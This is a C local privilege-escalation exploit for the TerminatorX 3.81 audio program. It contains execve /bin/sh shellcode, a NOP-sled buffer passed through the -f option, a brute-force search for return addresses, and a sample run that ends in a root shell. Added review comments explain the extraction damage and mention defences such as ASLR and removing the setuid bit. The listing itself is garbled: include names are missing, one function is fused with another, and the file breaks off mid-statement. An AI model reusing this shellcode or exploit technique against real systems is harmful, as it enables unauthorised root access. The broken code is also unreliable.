TerminatorX 3.81 stack overflow local root exploit

    
 
/* TerminatorX V. ][-b [-s ]]
                               *
                               * -r : no bruteforcing, try to execute shellcode with  as return address
                               * -b: enables bruteforcing
                               * -s: bruteforces by using return address from  to 0x00000000
                               *
                               * Example:
                               *
                               *root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b
                               *
                               * exploit: terminatorX V. ][-b [-s ]]
                               *
                               *[+] Starting bruteforcing...
                               *[+] Testing 0xbffff734...
                               *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König 
                               *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. 
                               *... 
                               *[+] Testing 0xbffff66c... 
                               *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König 
                               *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. 
                              *...
                               *tX: err: Error parsing terminatorXrc.
                               *tX: Failed loading terminatorXrc - trying to load old binary rc. 
                               *+ tX_warning: LADSPA_PATH not set. Trying /usr/lib/ladspa:/usr/local/lib/ladspa
                               ** tX_error: tX: Error: couldn't access directory "/usr/lib/ladspa". 
                               *+ tX_warning: Plugin "Sine Oscillator (Freq:audio, Amp:audio)" disabled. Not a 1-in/1-out plugin. 
                               *+ tX_warning: Plugin "Sine Oscillator (Freq:control, Amp:control)" disabled. Not a 1-in/1-out plugin. 
                               *+ tX_warning: Plugin "Stereo Amplifier" disabled. Not a 1-in/1-out plugin. 
                              *+ tX_warning: Plugin "White Noise Source" disabled. Not a 1-in/1-out plugin.
                               *warning: failed to load external entity "%90%90...%90%901%C0Ph//shh/bin%...%BFl%F6%FF%BF"
                               *
                               *(terminatorX:3085): WARNING **: Invalid UTF8 string passed to pango_layout_set_text() 
                              *sh-2.05b# exit *exit *[+] Exited: shell's ret code = 0 
                              *[+] Ret address found: 0xbffff66c
                               *
                               */

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              /*
                               * NOTE(review): this listing was damaged when the page was extracted
                               * (the #include header names and parts of several statements are
                               * missing), so it does not compile as shown.
                               *
                               * Defensive reading of the constants below: the two address constants
                               * are hard-coded. They look like 32-bit Linux stack addresses, so the
                               * technique presumably depends on an unrandomised, executable stack;
                               * ASLR and a non-executable stack would be expected to defeat it
                               * (confirm). The page title calls this a local root exploit, which
                               * presumably means the target binary is installed setuid root (confirm);
                               * if so, removing the setuid bit removes the privilege gain.
                               */

                              /* Size used by make_string(): it fills BSIZE minus the payload length with 0x90 bytes. */
                              #define BSIZE 200
                              /* Initial value of `start` in main(); the header transcript shows testing beginning at this address. */
                              #define D_START 0xbffff734
                              /* Absolute path of the binary that exec_vuln() executes. */
                              #define PATH "/usr/local/bin/terminatorX"
                              /* Fixed address constant; where it is used is not visible in this listing. */
                              #define RET 0xbffff69e

                              /* Payload bytes copied into the -f argument; the header transcript shows an sh prompt after a successful run. */
                              char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
                                    "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

                              /* buffer: heap string built by make_string() and passed to the target by exec_vuln().
                               * ptr: write cursor into buffer used by make_string(). */
                              char *buffer,*ptr;

                              /*
                               * Terminate the program if an allocation result is NULL.
                               *
                               * buffer: pointer to test. The parameter shadows the file-scope
                               *         `buffer`, so only the value passed in is examined.
                               *
                               * Returns normally when the pointer is non-NULL. Otherwise prints a
                               * message to stderr and exits with status 0, so the exit code does not
                               * distinguish this failure from a successful run.
                               */
                              void
                              checkme(char *buffer)
                              {
                                  if (buffer != NULL)
                                      return;

                                  fputs("[-] Can't allocate memory,exiting...\n", stderr);
                                  exit(0);
                              }


                              /*
                               * Replace the current process image with the target binary (PATH),
                               * passing the file-scope `buffer` as the value of its -f option.
                               *
                               * The whole crafted string travels in argv, so process-execution
                               * auditing that records command lines is where a defender would see it.
                               *
                               * execl()'s return value is ignored: if the exec fails, this function
                               * simply returns to its caller.
                               */
                              void
                              exec_vuln()
                              {
                                  const char *target = PATH;

                                  execl(target, target, "-f", buffer, NULL);
                              }


                              /*
                               * Run one attempt: fork a child that calls exec_vuln(), then wait for
                               * it in the parent and report how it ended.
                               *
                               * Returns:
                               *   - the child's exit status if it exited normally (also printed),
                               *   - the terminating signal number if it was killed by a signal,
                               *   - 1 if wait() failed, if the child was neither exited nor signalled,
                               *     or, in the child itself, if exec_vuln() returned.
                               * Exit codes and signal numbers share one return value, so the caller
                               * cannot always tell them apart.
                               *
                               * Exits the program with status 13 if fork() fails, and aborts if
                               * wait() reaps a process other than the child just created.
                               *
                               * Each call launches one short-lived instance of the target; a
                               * brute-force run therefore appears as a rapid series of launches,
                               * presumably many of them ending in a fatal signal.
                               */
                              int
                              tease()
                              {
                                  pid_t child;
                                  pid_t reaped;
                                  int st;

                                  child = fork();

                                  if (child == -1) {
                                      fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
                                      exit(13);
                                  }

                                  if (child == 0) {
                                      /* Child: only reaches the return if the exec did not happen. */
                                      exec_vuln();
                                      return 1;
                                  }

                                  /* Parent: collect the child's termination status. */
                                  reaped = wait(&st);
                                  if (reaped == -1) {
                                      fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
                                      return 1;
                                  }
                                  if (reaped != child)
                                      abort();

                                  if (WIFEXITED(st)) {
                                      printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(st));
                                      return WEXITSTATUS(st);
                                  }
                                  if (WIFSIGNALED(st))
                                      return WTERMSIG(st);

                                  fprintf(stderr, "[-] Stopped.\n");
                                  return 1;
                              }


                              /*
                               * Build the string that exec_vuln() later passes to the target as its
                               * -f argument, storing it in the file-scope `buffer`.
                               *
                               * ret_addr: address value copied into the local `ret`; how it is used
                               *           is not visible because the rest of the body is missing.
                               *
                               * Exits the program with status -1 if the 512-byte allocation fails.
                               *
                               * NOTE(review): only the start of this function survives on the page.
                               * Everything between the loop header below and the tail of banner()'s
                               * usage string was lost in extraction, so the return value and the
                               * remainder of the buffer layout cannot be determined from this listing.
                               */
                              int
                              make_string(long ret_addr)
                              {
                                    int i;
                                    long ret,addr,*addr_ptr;

                                    /* Fixed 512-byte heap buffer; it is never freed in the visible code. */
                                    buffer = (char *)malloc(512);
                                    if(!buffer)
                                    {
                                        fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
                                        exit(-1);
                                    }

                                    ret = ret_addr;

                                    ptr = buffer;

                                    /* Fill the front of the buffer with 0x90 bytes, leaving room for the payload within BSIZE. */
                                    memset(ptr,0x90,BSIZE-strlen(shellcode));
                                    ptr += BSIZE-strlen(shellcode);

                                    /* NOTE(review): damaged line. It fuses the start of a loop in make_string()
                                     * with the end of the usage message printed by banner(); the text in
                                     * between was stripped from the page. */
                                    for(i=0;i][-b [-s ]]\n\n",argv0);
                              }

                              int
                              main(int argc,char *argv[])
                              {
                                    char * option_list = "br:s:";
                                    int option,brute = 0, opterr = 0;
                                    long ret,start = D_START;

                                    banner(argv[0]);
                                    if (argc 

                              
